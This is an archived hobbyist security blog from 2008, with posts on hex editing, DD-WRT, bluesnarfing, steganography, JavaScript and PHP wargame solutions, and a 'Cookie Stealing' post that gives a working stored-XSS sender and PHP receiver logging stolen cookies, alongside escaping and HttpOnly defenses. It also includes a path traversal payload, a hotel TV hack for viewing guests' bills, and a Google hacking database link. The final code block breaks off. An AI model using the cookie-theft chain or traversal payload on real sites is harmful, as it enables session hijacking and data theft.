Google

Monday, March 10, 2008

Identity Protection

"What Exactly is LifeLock Identity Protection?

Identity theft is one of the fastest growing crimes today. By now hundreds of thousands of Americans have been victimized by this kind of financial crime. From kids to adults to the elderly, no one is spared from identity theft.

If you get victimized by this crime, you will work very hard to get your life back to the way it was. Your credit score will be ruined, you may lose your home, and some have even experienced being imprisoned for a crime that they didn't commit.

If you want to protect your identity and you want to prevent becoming a victim of identity theft, then you may want to hire LifeLock. LifeLock offers total protection from identity theft. It is a company that is dedicated to providing you with a guarantee that identity theft will never happen to you.

In fact, LifeLock can even guarantee their services for up to a million dollars. If you become a victim of identity theft while you are a LifeLock customer, they will guarantee your good name up to a million dollars.

LifeLock is one of the leading companies in identity theft protection. Even if would be thieves get a hold of your Social Security Number, you can be sure that LifeLock will be able to protect you.

So, if you don’t want to become a victim of identity theft, you may want to get protected under LifeLock. With LifeLock, you can be sure that you are well protected and keep your name as well as your credit score clean." -Lifelock

For those that are somewhat concerned about identity theft. Personally, I'd just keep my stuff to myself and shred important things. I suppose once hit by it I may change my story, but until then it's worked just fine for the last twenty-something years.

Monday, March 3, 2008

New Threats!

"At the DEFCON hackers' convention this summer, two researchers showed off a way to take control of a laptop through its wireless connection. The attack didn't target the operating system; it sought out specific flaws in the software that managed the wireless-networking hardware." -by Robert Lemos

What does this mean to us? This particular case is a software vulnerability in the code that manages the hardware, which can be fixed with software updates. But what if it were a vulnerability in the hardware's firmware, which would completely bypass the operating system, making EVERY system a target? This is somewhat like the change from phreakers (who hacked phones and telecommunication systems, and faded out) to hackers (who found loops and holes in software to make things perform in ways they weren't originally designed to; not crackers). This makes me wonder if we'll soon have a new breed of hackers concentrating strictly on hardware issues. If so, the new exploits will be rather difficult to protect against, short of firmware flashes, which 90% of box owners either A) don't know how to do, or B) are too lazy to do. (*EDIT* Obviously firmware would still be in the same ballpark as software, but hardly anyone ever upgrades firmware, thus making it a longer-lived exploit in the wild :/)

I will be keeping an eye out for these types of hacks as much as possible and keeping the blog updated with them.

Fun with Hex Editing.

For one of the missions on a site I head over to whilst bored, I was to find out the CD key of the program in order to register it. I was thinking it would be a little more difficult than it was, but to my dismay it was rather easy. First I grabbed the first hex editor I could find and opened the app that was given to break. After a quick ASCII search for "cd-key" I found it (the key was stored in cleartext right next to the label). Yay! It took longer to grab the hex editor than it did to find the CD key :( Hex editing can be used in multiple ways:
According to Hex Editor Wikipedia:
"By using a hex editor, a user can see or edit the raw and exact contents of a file as opposed to the interpretation of the same content that other, higher level application software may associate with the file format. For example, this could be raw image data, in contrast to the way image editing software would interpret the same file.

In most hex editor applications the data of the computer file is represented as hexadecimal values grouped in two groups of 8 bytes and one group of 16 ASCII characters, nonprintable characters normally represented by a dot,(".") in the ASCII part.

The standard Unix shell command used to display (though not edit) a file in hexadecimal and octal is od."

So, by using a hex editor you can change just about anything you want. For example, back in the day I used a hex editor to change spawn points on maps for a game I played. I won't dig into the things the 'bad' guys can do with it (^ CD keys *cough*), so we shall end it with this :D
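Here is the whole hex-editor workflow from above (the dump layout the Wikipedia excerpt describes, the ASCII search, and a same-length patch) as a small Python script. This is an added example and not code from the original post; the "binary" it operates on is a constructed byte string with a cleartext cd-key planted in it, and the helper names are mine.

```python
import re

# Constructed sample "binary": a fake 16-byte header, a few bytes of code, and
# the registration string stored in cleartext, the way the app in the mission did.
SAMPLE_BINARY = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9      # fake ELF-ish header
                 + b"\x55\x48\x89\xe5"                      # push rbp; mov rbp,rsp
                 + b"cd-key=ABCD-1234-EFGH\x00"             # the cleartext key
                 + b"\xc9\xc3" + b"\xff" * 6)               # leave; ret; padding


def hexdump(data: bytes, width: int = 16):
    """Yield lines in the classic hex-editor layout: offset, two groups of
    8 hex bytes, then a 16-character ASCII column with '.' for non-printables."""
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        left = " ".join(f"{b:02x}" for b in chunk[:8])
        right = " ".join(f"{b:02x}" for b in chunk[8:])
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        yield f"{off:08x}  {left:<23}  {right:<23}  |{text}|"


def find_ascii(data: bytes, needle: str) -> list:
    """Offsets of every occurrence of an ASCII string (the editor's 'find')."""
    pattern = re.escape(needle.encode("ascii"))
    return [m.start() for m in re.finditer(pattern, data)]


def read_cstring(data: bytes, offset: int) -> str:
    """Read the NUL-terminated string that starts at offset."""
    end = data.index(b"\x00", offset)
    return data[offset:end].decode("ascii", errors="replace")


def patch_bytes(data: bytes, offset: int, new: bytes) -> bytes:
    """Overwrite bytes in place. Same length only, so nothing after the patch
    moves: the rule you follow when editing a map or binary by hand."""
    if offset < 0 or offset + len(new) > len(data):
        raise ValueError("patch falls outside the file")
    return data[:offset] + new + data[offset + len(new):]


if __name__ == "__main__":
    for line in hexdump(SAMPLE_BINARY):
        print(line)
    for off in find_ascii(SAMPLE_BINARY, "cd-key"):
        print(f"found at 0x{off:x}: {read_cstring(SAMPLE_BINARY, off)}")
```

The search is a plain byte-pattern match, which is exactly why a key stored as cleartext is found in seconds; anything more than a trivial XOR or a check computed at runtime would defeat it, which is the lesson the mission is quietly teaching.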

Monday, February 25, 2008

Comcast: Friend or Foe

For those of you who have Comcast internet, you may want to take a look at the following:
Comcast to FCC
Also, here's a recent bill, that Google has some say in, that relates to Comcast:
Google cheers anti-Comcast legislation

An excerpt from Network Neutrality Wiki:
"Network neutrality (equivalently "net neutrality", "Internet neutrality" or "NN") refers to a principle that is applied to residential broadband networks, and potentially to all networks. Precise definitions vary, but a broadband network free of restrictions on the kinds of equipment that may be attached, on the modes of communication allowed, that does not restrict content, sites, or platforms and where communication is not unreasonably degraded by other communication streams would be considered neutral by most observers.[1][2][3]

The possibility of regulations designed to mandate the neutrality of the Internet has been subject to fierce debate in various fora. Though the term did not enter popular use until several years later, since the early 2000s advocates of net neutrality and associated rules have engaged in mutual campaigns of propaganda with broadband providers over the ability to use "last mile" infrastructure to block opposed internet applications, and content providers (e.g. websites, services, protocols), particularly those served by competitors. Neutrality proponents also claim that telecom companies seek to impose the tiered service model more for the purpose of profiting from their control of the pipeline rather than for any demand for their content or services.[4] Others have stated that they believe net neutrality to be primarily important as a preservation of current freedoms.[5] As Vint Cerf, co-inventor of the Internet Protocol, has stated, "The Internet was designed with no gatekeepers over new content or services. A lightweight but enforceable neutrality rule is needed to ensure that the Internet continues to thrive." [6]

Critics, meanwhile, call net neutrality rules "a solution in search of a problem" and believe that net neutrality rules would reduce incentives to upgrade networks and launch next generation network services.[7] Others argue that discrimination of some kinds, particularly to guarantee "Quality of Service," is not problematic, but highly desirable. Bob Kahn, Internet Protocol's co-inventor, has called the term "net neutrality" a slogan, and states that he opposes establishing it, warning that "nothing interesting can happen inside the net" if it passes: "If the goal is to encourage people to build new capabilities, then the party that takes the lead in building that new capability, is probably only going to have it on their net to start with and it is probably not going to be on anybody else's net.[8]"

In a June 2007 report, the Federal Trade Commission urged restraint with respect to the new regulations proposed by network neutrality advocates, noting the "broadband industry is a relatively young and evolving one," and given no "significant market failure or demonstrated consumer harm from conduct by broadband providers," such regulations "may well have adverse effects on consumer welfare, despite the good intentions of their proponents[9]." In turn, the FTC conclusions have been questioned in Congress, as in September 2007, when Sen. Byron Dorgan, D-N.D., chairman of the Senate interstate commerce, trade and tourism subcommittee, told FTC Chairwoman Deborah Platt Majoras that he feared new services as ground-breaking as Google could not get started in a system with price discrimination.[10]"

Post some comments with your thoughts on network neutrality or the lack thereof. I want to see how others feel about this subject!

Fun with your DD-WRT

For those that have a DD-WRT flashed router, here are some fun things you can do with it!
First off, here is a Firefox addon that will show your router's status in the status bar:
DD-WRT Firefox Addon

Boost your wireless signal
Go to the Wireless tab in the web interface, then 'Advanced Settings'. Scroll down to 'Xmit Power' and adjust accordingly (as the DD-WRT manual states, it is "safe" to increase it up to 70). Personally, I wouldn't want to fry my router, so I'd set it at 70 max ;) Keep in mind that transmit power is regulated: the legal limit for your country, not just the heat, is a reason not to crank it.

QoS
Prioritize bandwidth for things that are more important than others, such as games over torrents. This is something most stock firmwares don't come with, but luckily you have a DD-WRT router, right? :D

Cracking WEP
Using wepcrack on your DD-WRT, crack APs (only your own; please note this should never be done against anyone else's :P). Just set the capture files to be stored on a Samba mount. WEP has been broken for years, so if your own AP still uses it, the real fix is switching to WPA2.

More to come once my brain works a bit more!

Saturday, February 16, 2008

Blue Update!

I just received my Bluetooth dongle! Yay! Again, we have the little problem of my phone being Verizon, which thus can't use OPUSH, so I can't use bluesnarfer on it. I'm going to have to find someone with a different carrier and an older phone. But here is me bringing up the device and playing with bluesnarfer (obviously, for those who have used bluesnarfer, I'm using the wrong channel, but that was just to test if my phone would even pair with it, which it did, and I purposely entered the incorrect PIN to cancel it. And for those who haven't played with bluesnarfer, the part where it says:
bluesnarfer: open /dev/bluetooth/rfcomm/0, Connection refused
bluesnarfer: bt_rfcomm_config failed
bluesnarfer: unable to create rfcomm connection
bluesnarfer: release rfcomm ok
is because I entered the incorrect PIN and it disconnected :D)
Once I find a phone to play with I'll post some tutorials on how to use bluesnarfer :D So anyone looking to donate, shoot me an email and we'll talk!

Friday, February 15, 2008

Funny Quote

I was randomly cycling through my normal forums before hitting the sack and ran across a funny quote. A guy and his wife were sitting there, and he looks at her and says "Make me a sandwich". She says "What? Make it yourself". He then replies, "sudo make me a sandwich", and her response is "Okay." It made me chuckle after reading that. Hopefully a few of you get what happened in the conversation :P

Thursday, February 14, 2008

Cookie Stealing

Let's start by describing what this is, how to implement it, and why you need to protect against it.

Cookie Stealing:
Cookie stealing is composed of two parts: a sender and a receiver. The sender is whatever gets the victim's browser to send its cookie to the receiver; how to implement a sender is discussed below. The receiver is a script on a server the attacker controls that takes the information from the sender and stores it. Although this sounds simple, it can sometimes be complex.

Implementation:
The following is a sample PHP script for a receiver (the sender below passes the cookie in a GET parameter called hijackedcookie, so that is what the receiver reads):

<?php
// Take the cookie value the sender appended to the URL and store it
$hijackedcookie = $_GET["hijackedcookie"];
// Open the log file in append mode
$file = fopen('cookielog.txt', 'a');
// Write the stolen cookie to the log, followed by a blank line
fwrite($file, $hijackedcookie . "\n\n");
fclose($file);
?>


Now, that would be placed on some remote server. For our example we'll use localhost so as not to point at someone's actual site. Now that we have our receiver, we'll move on to a way to get the information sent to it: the sender. The following snippet can be used to steal the cookie:


<script>
document.location="http://localhost/receiver.php?hijackedcookie=" + document.cookie;
</script>


Now the tricky part is getting the above into a page the victim will load. This can be done by, say, sending the administrator of a site a message containing the script (of course the site must have a user-to-user messaging system, it must write the message into the page without escaping the HTML, and the admin's browser must have JavaScript enabled). Once the administrator opens the message the script runs, sending the receiver the cookie he is currently using. This is what's known as stored (persistent) cross-site scripting: the payload sits in the site's database and fires on whoever views it.

Security Risks:
It is quite obvious that this poses a huge security risk. If someone gets hold of a session cookie, they can pose as that user, which gives them all of the access rights that user has on the site. For instance, if done to a web admin, the hijacker now has rights to view or delete anything and everything on the website that the admin can from a browser. The two defenses that matter most: escape user-supplied text when it is written into a page (so a message is shown, not executed), and set the session cookie with the HttpOnly flag so document.cookie can't read it in the first place.



*The above information was gathered from multiple websites, but mostly http://www.freakwolfe.cheezyfilms.com/
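Here is the defensive side of the post in Python: the message-rendering step done the vulnerable way and the escaped way, plus the Set-Cookie header a login handler would send with and without HttpOnly. This is an added example and not code from the post or from the site it cites; the attacker message is a constructed sample built from the sender snippet above, and the function names are mine.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample: the message an attacker submits through the site's
# user-to-user messaging system (the "sender" from the post).
ATTACKER_MESSAGE = ('hi admin <script>document.location='
                    '"http://localhost/receiver.php?hijackedcookie="+document.cookie'
                    '</script>')


def render_message_vulnerable(body: str) -> str:
    """Drop the message into the page as-is: the <script> tag survives and runs
    in the reader's browser. This is the bug the post exploits."""
    return "<div class='msg'>" + body + "</div>"


def render_message_safe(body: str) -> str:
    """Escape on output: & < > \" ' become entities, so the browser shows the
    text of the message instead of executing it."""
    return "<div class='msg'>" + html.escape(body, quote=True) + "</div>"


def session_cookie_header(session_id: str, hardened: bool = True) -> str:
    """Build the Set-Cookie header a login handler would emit. With hardened=True
    the cookie is HttpOnly (invisible to document.cookie, so the sender snippet
    gets nothing), Secure (HTTPS only) and SameSite=Lax."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["path"] = "/"
    if hardened:
        jar["session"]["httponly"] = True
        jar["session"]["secure"] = True
        jar["session"]["samesite"] = "Lax"
    return jar.output(header="Set-Cookie:")


def contains_live_script(rendered: str) -> bool:
    """Crude check used only to show the difference: did a raw <script tag
    survive into the rendered HTML?"""
    return "<script" in rendered


if __name__ == "__main__":
    print(render_message_vulnerable(ATTACKER_MESSAGE))
    print(render_message_safe(ATTACKER_MESSAGE))
    print(session_cookie_header("abc123", hardened=False))
    print(session_cookie_header("abc123"))
```

Escaping belongs at the point where text is written into HTML, not at input time, because the same stored message may later be emitted into a different context (an attribute, a script block, JSON) that needs different escaping. HttpOnly does not stop XSS itself; it only removes the session cookie from what a script can read, so the attacker has to do their damage from inside the victim's open session instead of carrying the cookie away.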

Wednesday, February 13, 2008

Extemporaneous Linux haiku

I found this on another blog and it made me laugh, so I figured I'd post it ;)


(1) alloc_bootmem_core
many atomic bitops
it boots very slow

(2) testing to find oops
my tty's can't refresh
big kernel lock held

(3) buffers are dirty
all RAM I malloc'ed is swapped
bdflush won't flush

(4) the disk light flashes
sort by partition offset
all it does is seek

(5) run the test again
it runs ten times slower now
ZONE_DMA's full

(6) O of 1 is good
to get my CPU back
but kernel deadlocks

(7) dbench is not fair
aa somehow goes faster
what's wrong with rmap?

(8) Aunt Tillie is dumb
ESR wants to help her
why lkml?

(9) Athlons have some bugs
phone numbers on IRC
wow AMD called

(10) struct page is bloated
64 gig tries to boot
my kernel panicked

taken from http://csociety.org/pipermail/plug/2002-January/007940.html

Tuesday, February 12, 2008

Image Steganography

Just as a little insert while waiting for my Bluetooth USB, I decided to add this little tidbit. This could just as easily be found on Google, but here it goes. Say you want to send a file to a friend that you don't want out in the open. How can you do this? Encryption? Yes, but then they have to have a decryption tool. Here's a quick way to do it (on windoze). First, take the file you want to hide and zip it up; we'll call it file.zip. Now download a picture; we'll name it img.jpg. Now we'll hide the zip inside the picture. Image steganography, of the crudest kind: the zip is simply appended after the JPEG's end-of-image marker, and image viewers ignore whatever follows it. Here's the Windows command to make this easy:
c:\>copy /b img.jpg + file.zip newimg.jpg
Now we have a new file called newimg.jpg. If we open this file, it looks identical to the img.jpg picture we had. But if we look at the file size, it is a bit larger now, isn't it? That is because our zipped file is now inside it. Let's see if we can get the file out. Using WinZip or WinRAR, we open the newimg.jpg file as if it were a normal zip file, and voila, we have our hidden file :D (This works because zip readers locate the archive from its end, the central directory, so leading junk doesn't bother them.) Bear in mind this only hides the file from a casual look: the size jump, the data after the JPEG's end marker, and the zip signatures inside it all give it away to anyone who checks. Have fun with this information, and don't do anything I wouldn't do ;)
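The copy /b trick, the extraction, and the detection check, in Python so it runs anywhere. This is an added example and not part of the original post; the "JPEG" is a constructed byte string with just the SOI and EOI markers and filler in between (not a real image), the secret file is constructed too, and the function names are mine.

```python
import io
import zipfile

# Constructed stand-in for img.jpg: a JPEG begins with SOI (ff d8) and ends with
# EOI (ff d9). The middle is filler, not real image data.
JPEG_BYTES = b"\xff\xd8\xff\xe0" + b"\x00" * 64 + b"\xff\xd9"

# Constructed secret, the file that goes into file.zip.
SECRET_NAME = "secret.txt"
SECRET_DATA = b"meet at the usual place\n"


def make_zip(name: str, data: bytes) -> bytes:
    """Build file.zip in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def hide(image: bytes, archive: bytes) -> bytes:
    """The equivalent of `copy /b img.jpg + file.zip newimg.jpg`: plain concatenation."""
    return image + archive


def extract(stego: bytes) -> dict:
    """Open newimg.jpg as a zip. Image viewers stop at EOI; zip readers start
    from the central directory at the END of the file, so the prefix is ignored."""
    with zipfile.ZipFile(io.BytesIO(stego)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def trailing_bytes_after_eoi(data: bytes) -> int:
    """Detection: how many bytes follow the last ff d9 marker. A clean JPEG
    ends right there, so anything above zero deserves a second look."""
    eoi = data.rfind(b"\xff\xd9")
    if eoi == -1:
        return 0
    return len(data) - (eoi + 2)


if __name__ == "__main__":
    stego = hide(JPEG_BYTES, make_zip(SECRET_NAME, SECRET_DATA))
    print(f"image {len(JPEG_BYTES)} bytes, stego {len(stego)} bytes")
    print(f"bytes after EOI: {trailing_bytes_after_eoi(stego)}")
    print(extract(stego))
```

Python's zipfile handles the prepended data the same way WinZip does, by finding the end-of-central-directory record and computing the offset of the archive inside the larger file. The trailing-bytes check is what a forensic triage tool does with the same file.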

Blue Update

Good news, bad news. I've successfully hacked my RAZR V3c and changed a few things, such as enabling OBEX transfers (USB etc.) and such (although Verizon RAZRs don't allow 'push' due to not having the right protocols (woot, go lame Verizon)). Sweet custom LCD backgrounds and such :D Okay, on to the bad news. Apparently Verizon is using a somewhat newer technology called BREW (Binary Runtime Environment for Wireless) which encrypts the files for each phone, making it impossible to transfer said files to another phone (at least not at the moment). Sweet, cool, thanks Verizon. So anyway, using Blooover and such won't be possible on my phone, seeing as it is a Java application, and at this time I haven't been able to find a jar/jad -> BREW converter. So, until then, I'll be searching eBay for some cheap BT and Java-capable phones to toy with. And my BT USB should be here within the next few days; I'll try bluesnarfer from my PC with that once it arrives.

Saturday, February 9, 2008

Blue...

Well, I've recently been doing research on bluesnarfing, bluebugging, blueprinting, etc. I have just ordered a bluetooth usb device from ebay, and will be testing out some exploits as soon as I receive it. I'll keep you posted on the security holes and such I find as I go through it. Hopefully it will be here by this next weekend. Until then, Live Long and Prosper!

Friday, February 8, 2008

Google Addons

Not much in security, but I decided to add a search engine on the blog to link to google, and search within my blog, in the event it gets large. I also added a banner with content related ads, such as obtaining a CEH, etc. Thought it might be useful for some, if not, oh well, it's there if ya need it :D

Truecrypt

This is the info posted on their site:
TrueCrypt
Free open-source disk encryption software for Windows Vista/XP , Mac OS X, and Linux
Main Features:

* Creates a virtual encrypted disk within a file and mounts it as a real disk.

* Encrypts an entire hard disk partition or a storage device such as USB flash drive.

* Encryption is automatic, real-time (on-the-fly) and transparent.

* Provides two levels of plausible deniability, in case an adversary forces you to reveal the password:

1) Hidden volume (steganography – more information may be found here).

2) No TrueCrypt volume can be identified (volumes cannot be distinguished from random data).

* Encryption algorithms: AES-256, Serpent, and Twofish. Mode of operation: XTS.


I personally love using TrueCrypt to encrypt data. Especially using Linux at home and Vista at school, this works out perfectly. So say you have something such as passwords that you just can't seem to remember: TrueCrypt them! You can make a volume (just like in VirtualBox, VMware, etc.) that is just a file, set to a specific size, and all the data you put in it through TrueCrypt is encrypted using whichever algorithm you choose. Now here comes the fun part. With TrueCrypt, you can make a volume _WITHIN_ a volume, a "hidden" volume as they call it. Also, you can use files as a key (keyfiles), so even if someone gets your volume it would be very difficult to get at the contents without the key files. This is just a little info I thought I would share.
(Please note in some countries the use of encryption is illegal, check your local laws :D)

Wednesday, February 6, 2008

Google

Well boys and girls, I've lost top place on google. Oh shucks. Don't know how I ended up on #1 to begin with, but oh well. Just thought I'd put that out there. Again it makes no difference in any event.

Tuesday, February 5, 2008

Google Temp Ban

If you kiddies get one of these... You've been berry berry bwad :P Google Temp Ban. So, apparently using "inurl:**** ***** *****" (this isn't what was used as input, but for safety reasons I'm not going to post the exact query) in Google to find open webcams is something Google doesn't like. So, in short, don't do it! And forget you saw this here o.O

As an after thought, I removed the exact google hack, in case any of you try to use it.

Saturday, February 2, 2008

Google.com

I was bored and did a google search for my blog, trying to see how far up it is, and blamo! It's #1 :p IT Security Blog Not all that important, but I thought it was sweet :D Also, to those that actually view this, leave some comments :P Getting bored of logging in and not seeing anything :(

IP Octets (011010010111000000100000011011110110001101110100011001010111010001110011)

First off, the binary in the parentheses is the ASCII binary of "ip octets" :P Anyhoo, a buddy of mine brought it to my attention last night that most applications accept just three octets instead of all four. So it would be w.x.y.z for four, correct? I hope you said yes -.- Anyway, to make it three it would be w.x.(y*256+z): the last number fills in all the bytes that are left. So we thought, hey, how far can we go with this, and tried making it just two: w.(x*65536 + y*256 + z), and it worked! Next I said, hey, I'm a genius, let's try figuring the math for just one: w*16777216 + x*65536 + y*256 + z. And of course it worked! (This is the behaviour of the C library's inet_aton, which is why so many programs accept it.) So I decided to write a shell script to do this. And here is said script for those of you using *nix instead of windoze:
#!/bin/sh
# Usage: ./ipoctets.sh w.x.y.z
x="$1"
x1=`echo "$x" | awk -F . '{print $1}'`
x2=`echo "$x" | awk -F . '{print $2}'`
x3=`echo "$x" | awk -F . '{print $3}'`
x4=`echo "$x" | awk -F . '{print $4}'`
grr=`expr 256 "*" 256 "*" 256`
y0=`expr "$x1" "*" "$grr"`
y1=`expr "$x2" "*" 65536`
y2=`expr "$x3" "*" 256`
outcome3=`expr "$y2" + "$x4"`
outcome2=`expr "$y1" + "$y2" + "$x4"`
outcome1=`expr "$y0" + "$y1" + "$y2" + "$x4"`
echo "------------------------------------------"
echo "Input IPv4: $x"
echo "------------------------------------------"
echo "Outcome with 3 Octets: $x1.$x2.$outcome3"
echo "Outcome with 2 Octets: $x1.$outcome2"
echo "Outcome with 1 Octet: $outcome1"
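The same conversion in Python, going in both directions: it produces the four spellings the shell script prints and, more usefully, parses any of them back into one 32-bit value. This is an added example and not part of the original post; it implements the "last part fills the remaining bytes" rule described above for decimal parts only (the octal and hex prefixes inet_aton also accepts are deliberately left out), and the function names are mine.

```python
def parse_dotted(text: str) -> int:
    """Parse the 1- to 4-part dotted forms into a 32-bit integer.

    Rule (the inet_aton convention): every part except the last is one byte,
    and the LAST part fills all the bytes that are left. So "192.168.266"
    means 192 . 168 . (1*256 + 10). Assumption: decimal parts only.
    """
    parts = text.split(".")
    if not 1 <= len(parts) <= 4:
        raise ValueError("expected 1 to 4 dot-separated parts")
    values = [int(p, 10) for p in parts]
    leading, last = values[:-1], values[-1]
    for v in leading:
        if not 0 <= v <= 255:
            raise ValueError("leading parts must be 0-255")
    last_bytes = 4 - len(leading)
    if not 0 <= last < (1 << (8 * last_bytes)):
        raise ValueError("last part out of range for the bytes it must fill")
    result = 0
    for v in leading:
        result = (result << 8) | v
    return (result << (8 * last_bytes)) | last


def to_dotted(addr: int) -> str:
    """Canonical four-octet spelling of a 32-bit address."""
    if not 0 <= addr <= 0xFFFFFFFF:
        raise ValueError("not a 32-bit address")
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def all_forms(ip: str) -> list:
    """The four spellings the shell script prints, derived from one value."""
    n = parse_dotted(ip)
    a, b, c, d = (n >> 24) & 0xFF, (n >> 16) & 0xFF, (n >> 8) & 0xFF, n & 0xFF
    return [f"{a}.{b}.{c}.{d}",
            f"{a}.{b}.{c * 256 + d}",
            f"{a}.{b * 65536 + c * 256 + d}",
            str(n)]


def same_host(a: str, b: str) -> bool:
    """Compare two addresses by value, never by string."""
    return parse_dotted(a) == parse_dotted(b)


if __name__ == "__main__":
    for form in all_forms("192.168.1.10"):
        print(f"{form:>16} -> {to_dotted(parse_dotted(form))}")
```

The security angle is the reason a practitioner cares: a filter that blocks "127.0.0.1" by string comparison is walked straight past by "127.1" or "2130706433", since the resolver and most HTTP libraries accept all of them. Canonicalize to the integer first (parse_dotted here, or socket.inet_aton), then compare.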

German Trojans

So, apparently the German government, after banning the creation, ownership, and use of "hacking" software, decided to create their own Trojans to deploy to spy on their citizens. They are even thinking of jacking some Skype lines. Speaking of ethics, I would say that this is some major BS on their side. That's like the Patriot Act listening in on our phone conversations and reading our emails. Yeah, you can catch a bad guy that way, and get into the lives of the good guys too. I don't think it's very ethical. In my opinion governments need to stay out of civilians' lives. I know they are there to "protect and serve", but I mean come the @#$% on... This is going a bit off topic, but I'm not a big fan of my government prying into my life. Anyway, back on topic. "Hacking" tools are being banned in many countries now. So what will this do? It will stop the good guys trying to learn, i.e. pen testers, from keeping up with the bad guys, who will have these tools whether it's legal or not. In short, government=blah, HACK THE PLANET! -Hackers movie :P

Thursday, January 24, 2008

Google Hacking Database

For those of you who care to learn more about using Google as a tool, rather than just a search engine for finding your favorite celebrities' gossip, I decided to post this link. It is a Google hacking database, containing all the sweet little snippets you can put into it to gather anything from passwords to company secret documents. But, as with most of my blog posts, I would advise you not to do anything I tell you about outside your own network. Here's the link: http://johnny.ihackstuff.com/ghdb.php
May the force be with you my young padawans.

Non-techish Hacks: zwei (german for 2 o.O)

Another great non-technical hack that I found was in hotel rooms. I won't delve into great detail on how to do this, but basically, there is a way to break the security on their television channels within about two seconds (depending on how fast you can remove a coax :P). After doing so, one could watch any channel one would otherwise have to pay for. Also, in larger hotels, when a customer views their bill, it unlocks a specific channel and sets it to their information; now if we pre-hacked our room, we could change channels, hit someone's channel that was unlocked, and see their billing info. Now, with that in mind, say they have that new spiffy internet through the TV? Now we can see what they are doing on the internet, be it viewing naughty websites, or viewing their bank website and logging in. This is obviously a 'do not try this at home, kids' subject. But I found it great to see some not-so-technical things such as this. I hope to find some more articles similar to this.

Non-techish Hacks

I was bored and randomly searching for some interesting info, and I came across an article on no-tech hacking. It was a large article on shoulder surfing and dumpster diving. After reading this, I realized just how easy it is to let someone get information from you without even knowing it. It gave me a new outlook on social engineering. In the article, the author listed a few things I never even thought about. For instance, looking at someone's laptop at an internet cafe, you may notice a bunch of stickers. This will explain a lot about a person and their desktop. For example, if you see 10 cat stickers, chances are they may have a password that has to do with a cat, be it their own cat's name, the name of a breed of cat, etc. Looking at their desktop is an easy grab of information. Most novice users don't change backgrounds, for example, and that right there will show the current operating system. You can also check their taskbar for running applications, which will show you possible targets. There are tons of goodies sitting on their desktop most of the time, for ease of access. So all in all I would say this was a great article, and I'm glad I stumbled upon it.

Wednesday, January 9, 2008

JS Final

Okay, this one, just like the others, was easy, but tricky if you don't think about it for a bit. Looking at the script, it is quite jumbled. There seem to be a bunch of functions. Now we look for the one that's actually used. After some searching we see that after the post it goes to a separate script, so we now look at that. It has 2 different variables, unlike the one before, and it checks to see if _your_ password is equal to var1+" "+var2, which means 'var1[spacebar]var2'. Ok, let's go back and input that password. Voila, simple, and finished. :D

JS5!

Okay, this one was a bit different. It used a new function called unescape. The objective was to unescape a string, which was the password (the unescaped version, that is). So this was quite simple: to find that we needed to use unescape, we view the source, which showed us variable=unescape('%21%43%blah%blah'), and we want our password to equal whatever variable is. So, we look for a text unescape utility site and input the string we want unescaped. Voila, as simple as most of the others; we now have our password and have completed the mission. WWWEEEEE!!!!

JS4!

Okay, after about 20 minutes of trying this one... I finally realized the answer and wanted to bash myself in the head with the keyboard :( Basically, the challenge is: make your password equal a variable. And the variable is set in the page. You look in the code they placed and you see "+blahblah+" == "+blah+". Now, you would think that to make your password equal blahblah it would be blah, right? Unfortunately no :/ The +'s around them mean they aren't used there. So that means we have to find the blahblah == somewhere else... okay, let's do a search within the source. There we go, we found blahblah == passwordhere. So, after the headache, it was right there, just not out in plain sight :/ So, the lesson learned here? Sometimes things aren't always as they seem, and try to look at something as a whole, not just the piece you _think_ you need.

JS3!

On to JSM3! Okay, so this took a bit of math and a bit of JS understanding. So it was a bit tricky, since at first glance the math seemed easy. The math looked like this: ((5+(6*7))%8)*2. So, to me, thinking math-wise, I would assume it would be 6*7=42, +5=47, /8=5.875, *2=11.75. Now, math-wise, that looks good. The only problem is, in JS the % symbol doesn't mean division. It's the modulo operator: divide by the number and keep the remainder. So let's go back: 6*7=42, +5=47, 47%8=7 (47/8 is 5 remainder 7), *2=14. So now the JS checks to see if the password you typed is as long as this value, which is 14, so we just type out a 14-character password and BAM, we win! :D

JS2

Okay, reposting JS2 due to it not saving for some reason... Anyway, basically for the second mission, all you do is disable javascript and it's completed. So, yeah... I was hoping it would be a bit more difficult? Guess not, but what can you do :/

Javascript Missions

I decided to try my hand at JS. So I selected the first JS mission. It was a bit TOO simple. The scenario was, that a girl, VERY new to JS wrote a script, that checks a password, and if you type the correct password, you win. If not you lose.
Or for you geeks out there,

if pwiscorrect = true then
win
else
lose
endif

And moving on :P Basically, view the source of the page, find her script, and within her script she has
if (password == "string")
{
    win
}
and basically, you want to win, right? Of course you do, so you input whatever the string is to make it equal, and BAM, we're done. Too easy, drill sergeant!

Java, SQL, PHP Oh my!!

In the second mission, the objective was to get the source code of a site, using their script, which prints the contents of whatever file you input into the box. So if we put a filename in the box, it shows a file in the directory the script runs from. In the mission it wanted something that was _not_ in that directory. Here is the function:
$blarghonkhonk = file_get_contents($_POST['filename'].'.php');
(again variables and such changed as to not 'steal' from the source site)

Ok. So, as I pointed out earlier, on its own the function looks for the file relative to the directory the script runs from, and it appends .php to whatever you type; nothing stops you from putting ../ in the name, though, and that is the bug (a path traversal / local file inclusion). The file we want is 2 levels above it. Here's where knowing how to navigate a filesystem comes in handy :P Two levels up is ../../, and we wanted index.php, so (since .php is appended for us) the answer would be:
../../index
Voila Completed! In about 2 seconds (or however long it takes to read the objective)
The first time I read it, it sounded a lot more complicated than it actually was. I was thinking you would have to use RFI, Remote File Inclusion, where you would input a URL like http://thesitenamethatshalnotbenamed.x/index and the script would fetch index.php from that remote host (file_get_contents happily does that when allow_url_fopen is on). So, there's some extra reading for those who care to learn a bit about RFIs :D
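The same mistake and its fix, side by side in Python. This is an added example and not code from the mission or the site; it assumes the pages live under /var/www/app/pages (a made-up location) and mirrors the PHP line above by appending .php to whatever the user supplies. The fix resolves the final path and checks it still lies under the base directory, which also catches absolute paths and symlink tricks that a simple "does it contain ../" check misses.

```python
import os

# Assumption: the directory the include script runs from. The vulnerable PHP
# did file_get_contents($_POST['filename'] . '.php') with no check at all.
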